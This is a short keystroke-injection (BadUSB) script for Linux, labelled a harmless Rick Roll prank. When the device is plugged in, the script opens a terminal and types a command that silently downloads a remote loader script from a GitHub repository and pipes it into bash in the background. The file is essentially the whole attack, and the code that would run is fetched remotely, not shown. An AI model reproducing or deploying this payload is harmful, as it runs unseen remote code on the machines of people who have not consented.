REM ============================================================
REM 🎵 Rick Roll - Linux
REM ============================================================
REM Author: dil1thium
REM Version: 3.0 (Modular)
REM Target: Linux
REM Category: Fun
REM
REM ✅ PLUG AND PLAY
REM Opens Rick Roll at max volume.
REM ============================================================
DELAY 500
CTRL ALT t
DELAY 1500
STRING M="rickroll" bash -c 'curl -sL https://raw.githubusercontent.com/reschjonas/FlipperZero_BadUSB/main/remote-payloads/loaders/loader.sh|bash' &
ENTER
DELAY 500
STRING exit
ENTER
